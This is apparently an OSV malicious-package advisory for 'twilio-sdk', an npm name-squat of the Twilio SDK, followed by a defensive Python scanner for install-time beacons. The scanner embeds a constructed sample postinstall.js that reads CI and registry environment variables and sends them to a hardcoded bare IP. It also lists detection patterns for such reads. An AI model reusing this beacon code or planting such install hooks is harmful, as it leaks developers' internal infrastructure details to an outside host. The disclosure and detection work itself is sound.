npm

twilio-sdk @0.2.4

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5621

Ecosystem

npm

Summary

The package twilio-sdk impersonates the official Twilio Node SDK (twilio) but ships an empty API (module.exports = {}). Its only real behavior runs in postinstall.js, declared in package.json as "postinstall": "node ./postinstall.js". On npm install, postinstall.js collects the installer's hostname, DNS-resolved FQDN, Active Directory domain (USERDNSDOMAIN), current working directory, Node version, CI flag, and CI/SCM identifiers (GITHUB_REPOSITORY, CIRCLE_*, CI_PROJECT_PATH, BITBUCKET_REPO_FULL_NAME, BUILD_REPOSITORY_URI, TRAVIS_REPO_SLUG, JENKINS_URL, CI_SERVER_URL), as well as the configured internal npm registry (npm_config_registry), and sends them as query parameters in a plaintext HTTP GET to http://46.224.67.169:3000/ping. The combination of a name-squat against a top-tier SDK, a divergent (empty) API, and an unconsented install-time beacon to a hardcoded bare IP is install-time reconnaissance for downstream targeting (dependency confusion against the leaked internal registry, lateral movement using the leaked AD domain and internal CI URLs). The package's own README labeling it a 'security research honeypot' does not change the installer-side impact: any developer who mistypes twilio and installs this package leaks internal infrastructure identifiers to a third-party IP.

Source: amazon-inspector (737fede3d5b2007849cab0503cec191ce127c33c0b28f3b3285f347a064966e1)
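The indicators listed above (a lifecycle hook that runs a script, reads of CI and registry environment variables, and a plaintext request to a hardcoded bare IP) can be checked statically before a package is allowed into a build. The script below is an added defensive example, not code from the advisory or from the package; its package.json and postinstall.js inputs are constructed to mirror the shapes described here, the WATCHLIST of well-known names and the LOOKALIKE_SUFFIXES are assumptions, and the environment-variable list is the one the advisory names.

```python
import json
import re

# Constructed sample package.json mirroring the manifest shape described in the
# advisory (this is not the malicious package's actual file).
SAMPLE_PACKAGE_JSON = """{
  "name": "twilio-sdk",
  "version": "0.2.4",
  "main": "index.js",
  "scripts": { "postinstall": "node ./postinstall.js" }
}"""

# Constructed sample install script carrying the same kinds of indicators the
# advisory lists: reads of CI/registry environment variables and a plaintext
# HTTP request to a hardcoded bare IP. Not the package's real postinstall.js.
SAMPLE_POSTINSTALL_JS = """
const os = require('os');
const http = require('http');
const q = new URLSearchParams({
  host: os.hostname(),
  domain: process.env.USERDNSDOMAIN || '',
  repo: process.env.GITHUB_REPOSITORY || '',
  registry: process.env.npm_config_registry || ''
});
http.get('http://46.224.67.169:3000/ping?' + q.toString());
"""

# Assumed watchlist of well-known package names and common squat suffixes.
WATCHLIST = {"twilio"}
LOOKALIKE_SUFFIXES = ("-sdk", "-js", "-node", "-client", "-api")
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

BARE_IP_URL = re.compile(r"""https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?[^\s'"]*""")
ENV_READ = re.compile(r"""process\.env(?:\.(\w+)|\[['"](\w+)['"]\])""")
NETWORK_MODULE = re.compile(r"""require\(['"](?:http|https|net|dgram|child_process)['"]\)""")
# Environment variables the advisory says the beacon collects.
SENSITIVE_ENV = re.compile(
    r"^(USERDNSDOMAIN|GITHUB_REPOSITORY|CIRCLE_\w+|CI_PROJECT_PATH|"
    r"BITBUCKET_REPO_FULL_NAME|BUILD_REPOSITORY_URI|TRAVIS_REPO_SLUG|"
    r"JENKINS_URL|CI_SERVER_URL|npm_config_registry|CI)$"
)


def lookalike_of(name):
    """Return the watchlist name this package name imitates, or None."""
    base = name
    for suffix in LOOKALIKE_SUFFIXES:
        if base.endswith(suffix):
            base = base[: -len(suffix)]
            break
    return base if base in WATCHLIST and base != name else None


def install_hooks(package_json_text):
    """Lifecycle scripts that npm runs automatically during install."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def script_indicators(source):
    """Static indicators of an install-time beacon in a JavaScript source."""
    env_names = {a or b for a, b in ENV_READ.findall(source)}
    return {
        "bare_ip_urls": BARE_IP_URL.findall(source),
        "sensitive_env": sorted(n for n in env_names if SENSITIVE_ENV.match(n)),
        "network_module": bool(NETWORK_MODULE.search(source)),
    }


def assess(package_json_text, script_sources):
    """Combine the checks into a verdict: allow, review or block."""
    manifest = json.loads(package_json_text)
    hooks = install_hooks(package_json_text)
    findings = []
    imitated = lookalike_of(manifest.get("name", ""))
    if imitated:
        findings.append(f"name looks like a squat of '{imitated}'")
    for hook, cmd in hooks.items():
        findings.append(f"lifecycle hook '{hook}' runs: {cmd}")
    beacon = False
    for path, src in script_sources.items():
        ind = script_indicators(src)
        if ind["bare_ip_urls"] or ind["sensitive_env"]:
            beacon = True
            findings.append(f"{path}: network={ind['network_module']} "
                            f"urls={ind['bare_ip_urls']} env={ind['sensitive_env']}")
    if hooks and beacon:
        verdict = "block"          # install hook plus beacon indicators
    elif hooks or imitated:
        verdict = "review"         # worth a human look, not conclusive alone
    else:
        verdict = "allow"
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    report = assess(SAMPLE_PACKAGE_JSON, {"postinstall.js": SAMPLE_POSTINSTALL_JS})
    print(report["verdict"])
    for finding in report["findings"]:
        print(" -", finding)
```

Run against the constructed inputs the verdict is "block", because a lifecycle hook and beacon indicators occur together; a package with only a postinstall hook (common for native builds) or only a lookalike name lands in "review" rather than being rejected outright. Because npm runs install scripts before any scanner sees the unpacked tree, the check is most useful in CI with installs done under --ignore-scripts and this assessment applied to the fetched tarball contents first.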
